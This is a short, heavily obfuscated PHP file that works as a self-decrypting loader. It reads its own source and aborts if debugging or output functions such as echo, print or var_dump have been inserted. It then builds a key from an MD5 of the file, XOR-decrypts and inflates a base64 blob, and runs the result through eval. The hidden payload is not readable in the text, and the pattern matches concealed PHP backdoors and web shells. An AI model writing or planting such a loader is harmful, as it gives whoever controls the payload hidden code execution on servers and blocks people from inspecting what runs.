<?php
$zcdgmjec="340876798689d68e4bb34df78493b8f9";
$bdmnzj="5200070f0e0f025808005a5d57525a04565152505657555509060903550d5e00";
$yiplownptsz="/Lr8Pft5OSRPE2kFacyaYKexv8ZZ8r4XIPVoN9WBHApLfMjqr28d2UOvEfaoj5MvuJMVO1d+istMoqqpc/6FLEObDm9/bO0wtQpSxGREHTA6kOLrvOP3UQo559haRY0+iGJ/pY1qd0C6sTvcCvl14loLSkUktBRp3+F9NnAFN/7tIS5vL+a+cFVWwPZ/KV0GEnlDCx05Z3aHKkDq1/rAB9zJNw==";
$wjfviz=file_get_contents(__FILE__);
$dnwbhbquw=str_replace($yiplownptsz,"",$wjfviz);
if(strpos($dnwbhbquw,"ec"."ho")!==false||strpos($dnwbhbquw,"pr"."int")!==false||strpos($dnwbhbquw,"var_"."dump")!==false||strpos($dnwbhbquw,"file_put_"."contents")!==false||strpos($dnwbhbquw,"fw"."rite")!==false){die();}
$wuickiglbg=str_replace(array($zcdgmjec,$bdmnzj),array("SP_ca0bbbd9","KP_e99ce5ca"),$wjfviz);
$navjukoj=md5($wuickiglbg);
$zngqko=hex2bin($bdmnzj);
$avjgtnsvbphv="";
$kuktyyccr=strlen($navjukoj);
for($dvzgkyju=0;$dvzgkyju<$kuktyyccr;$dvzgkyju++){
    $avjgtnsvbphv.=chr(ord($zngqko[$dvzgkyju])^ord($navjukoj[$dvzgkyju]));
}
$qxnpkqfksfh=base64_decode($yiplownptsz);
$xcnakeww=strlen($qxnpkqfksfh);
$nyegpyakvdrz="";
$fkijiy=strlen($avjgtnsvbphv);
for($dvzgkyju=0;$dvzgkyju<$xcnakeww;$dvzgkyju++){
    $nyegpyakvdrz.=$qxnpkqfksfh[$dvzgkyju]^$avjgtnsvbphv[$dvzgkyju%$fkijiy];
}
$ipnomvxt="gz"."in"."fl"."ate";
eval($ipnomvxt($nyegpyakvdrz));
